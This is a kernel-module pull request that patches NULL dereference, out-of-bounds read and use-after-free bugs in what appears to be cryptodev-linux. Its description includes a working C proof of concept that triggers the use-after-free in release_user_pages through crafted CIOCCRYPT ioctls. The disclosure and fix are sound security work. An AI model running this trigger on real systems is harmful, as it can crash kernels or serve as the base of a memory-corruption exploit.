### PR TITLE
Fixes about NULL pointer dereferences + oob read + UAF

### DIFF
--- a/ioctl.c
+++ b/ioctl.c
@@ -516,6 +516,11 @@ crypto_copy_hash_state(struct fcrypt *fcr, uint32_t dst_sid, uint32_t src_sid)
 		derr(1, "Failed to get sesssions with sid=0x%08X sid=%0x08X!",
 		     src_sid, dst_sid);
 		return ret;
+	} else if (crypto_ahash_statesize(dst_ses->hdata.async.s) != crypto_ahash_statesize(src_ses->hdata.async.s)) {
+		derr(1, "Mismatched state sizes between sessions 0x%08X and 0x%08X!",
+		     src_sid, dst_sid);
+		ret = -EINVAL;
+		return ret;
 	}
 
 	ret = cryptodev_hash_copy(&dst_ses->hdata, &src_ses->hdata);
@@ -922,6 +927,8 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
 
 	if (unlikely(!pcr))
 		BUG();
+	if (unlikely(!arg_))
+		return -EINVAL;
 
 	fcr = &pcr->fcrypt;
 

--- a/main.c
+++ b/main.c
@@ -175,6 +175,15 @@ __crypto_run_zc(struct csession *ses_ptr, struct kernel_crypt_op *kcop)
 		return __crypto_run_std(ses_ptr, cop);
 	}
 
+	// if the src and dst are the same we need to clear the size otherwise
+	// the crypto api will iterate through the scatterlist causing a NULL
+	// pointer dereference and same issue if only one pointer is initialized
+	if (src_sg == dst_sg) {
+		cop->len = 0;
+	} else if ((src_sg && !dst_sg) || (!src_sg && dst_sg)) {
+		return 0;
+	}
+
 	ret = hash_n_crypt(ses_ptr, cop, src_sg, dst_sg, cop->len);
 
 	release_user_pages(ses_ptr);


### PR DESCRIPTION
I fixed some bugs leading to DoS including:
- A lot of different NULL pointer dereferences
- A divide by zero error in `cryptodev_get_dst_len`
- An out of bound read in `crypto_copy_hash_state`
- UAF in release_user_pages, this bug is actually dangerous, it allows an attacker to decrement the reference counter of a struct page as many times as he wants. I do consider it as a serious security issue, if you would like to reproduce this UAF you can use the following proof of concept:
```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include "../crypto/cryptodev.h"
#include "aes.h"

#define	KEY_SIZE	16
#define CIPHER_SZ 0x3000

int
main()
{
	int cfd = -1;
    struct session_op session = {0};
    struct crypt_op cryp = {0};
    uint8_t key[KEY_SIZE] = {0};
    uint8_t plaintext[CIPHER_SZ] = {0};
    uint8_t ciphertext[CIPHER_SZ] = {0};
    uint8_t iv[16] = {0};

	/* Open the crypto device */
	cfd = open("/dev/crypto", O_RDWR, 0);
	if (cfd < 0) {
		perror("open(/dev/crypto)");
		return 1;
	}

	/* Set close-on-exec (not really neede here) */
	if (fcntl(cfd, F_SETFD, 1) == -1) {
		perror("fcntl(F_SETFD)");
		return 1;
	}

	session.cipher = CRYPTO_AES_CBC;
	session.keylen = KEY_SIZE;
	session.key = (void*)key;

    if (ioctl(cfd, CIOCGSESSION, &session)) {
		perror("ioctl(CIOCGSESSION)");
		return -1;
	}

	cryp.ses = session.ses;
	cryp.len = CIPHER_SZ;
	cryp.src = plaintext;
	cryp.dst = ciphertext;
	cryp.iv = (void*)iv;
	cryp.op = COP_ENCRYPT;
	if (ioctl(cfd, CIOCCRYPT, &cryp)) {
		perror("ioctl(CIOCCRYPT)");
		return -1;
	}

	cryp.ses = session.ses;
	cryp.len = CIPHER_SZ;
	cryp.src = NULL;
	cryp.dst = (uint8_t* )0xdeadbeef;
	cryp.iv = (void*)iv;
	cryp.op = COP_ENCRYPT;
	if (ioctl(cfd, CIOCCRYPT, &cryp)) {
		perror("ioctl(CIOCCRYPT)");
		return -1;
	}

	/* Close the original descriptor */
	if (close(cfd)) {
		perror("close(cfd)");
		return 1;
	}

	return 0;
}
```

It will make `release_user_pages` call `put_page` on already freed pages.